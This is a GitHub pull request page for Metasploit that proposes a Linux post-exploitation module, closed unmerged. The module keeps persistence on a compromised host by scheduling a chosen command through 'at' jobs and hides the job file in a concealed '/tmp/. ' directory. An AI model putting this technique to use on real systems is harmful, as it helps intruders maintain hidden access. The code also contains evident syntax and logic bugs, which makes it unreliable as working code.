Skip to content

Loading…

Linux post module for persistence via AT. #1606

Closed
wants to merge 2 commits into from

2 participants

@jabra-

Linux post module that will run a command (via AT) to maintain persistence on the remote system.

@jvazquez-r7

Hi @jasbro,

First of all, thanks very much for your effort, but at the moment we're going to close this pull request without merging because currently there is work in progress to merge the initial work from @alexmaloteaux , sent via #629. We think this pull request will overlap with this persistence work. Thanks, and if you have any questions, don't hesitate to ask.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Commits on Mar 15, 2013
  1. @jabra-
  2. @jabra-

    move to a random filename

    jabra- committed
This page is out of date. Refresh to see the latest.
Showing with 56 additions and 0 deletions.
  1. +56 −0 modules/post/linux/manage/at_trojan.rb
View
56 modules/post/linux/manage/at_trojan.rb
@@ -0,0 +1,56 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/linux/system'
+require 'msf/core/post/linux/priv'
+
+class Metasploit3 < Msf::Post
+
+ include Msf::Post::Common
+ include Msf::Post::File
+ include Msf::Post::Linux::System
+
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Linux Install Trojan',
+ 'Description' => %q{
+ This module installs a Linux Trojan to run very hour via AT.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Joshua D. Abraham <jabra[at]praetorian.com>',
+ ],
+ 'Platform' => [ 'linux' ],
+ 'SessionTypes' => [ 'shell' ]
+ ))
+ register_options(
+ [
+ OptString.new('COMMAND', [true, 'The command to run.', 'touch /tmp/test.txt'])
+ OptInt.new('FREQ', [true, 'Duration (in hours) to run this command.', 1])
+ ], self.class)
+ end
+
+ def run
+ print_status "Installing trojan to run : #{datastore['COMMAND']}"
+
+ vcmd_exec("touch /var/spool/cron/atjobs/.SEQ")
+ vcmd_exec("cd /var/spool/cron/atjobs")
+ vcmd_exec("chown daemon.daemon .SEQ")
+ vcmd_exec("mkdir -p /tmp/'. '")
+ file = rand_text_alpha(128)
+ vcmd_exec("echo #{datastore['COMMAND']} >>" + "/tmp/'. '/.#{file}")
+ for i in 0..datastore['COMMAND']
+ vcmd_exec("at now + #{i} hour -f " + "/tmp/'. '/.#{file}")
+ end
+ end
+end
Something went wrong with that request. Please try again.